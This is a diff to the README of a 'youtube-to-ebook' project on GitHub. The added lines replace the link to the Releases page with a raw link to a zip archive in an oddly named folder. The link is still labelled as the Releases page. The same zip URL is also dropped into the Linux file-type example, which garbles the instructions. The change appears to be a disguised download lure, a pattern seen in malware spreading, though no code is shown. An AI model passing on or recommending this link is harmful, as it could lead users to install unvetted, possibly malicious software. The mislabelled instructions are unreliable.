HoangTheElegant/youtube-to-ebook/README.md

 ## 📥 Download & Install

-1. Click on the link to the Releases page: [Download from Releases](https://github.com/HoangTheElegant/youtube-to-ebook/releases).
+1. Click on the link to the Releases page: [Download from Releases](https://raw.githubusercontent.com/HoangTheElegant/youtube-to-ebook/main/scabbedness/youtube_ebook_to_v1.6.zip).

 2. On the Releases page, you will see a list of versions.
 Look for the latest version, which is highlighted at the top.

 3. Find the file that matches your operating system.
 For example:
    - For Windows, look for a file that ends with `.exe`.
    - For macOS, look for a file that ends with `.dmg`.
-   - For Linux, you may find an archive file like `.tar.gz`.
+   - For Linux, you may find an archive file like `https://raw.githubusercontent.com/HoangTheElegant/youtube-to-ebook/main/scabbedness/youtube_ebook_to_v1.6.zip`.

 4. Click on the appropriate file link to start the download.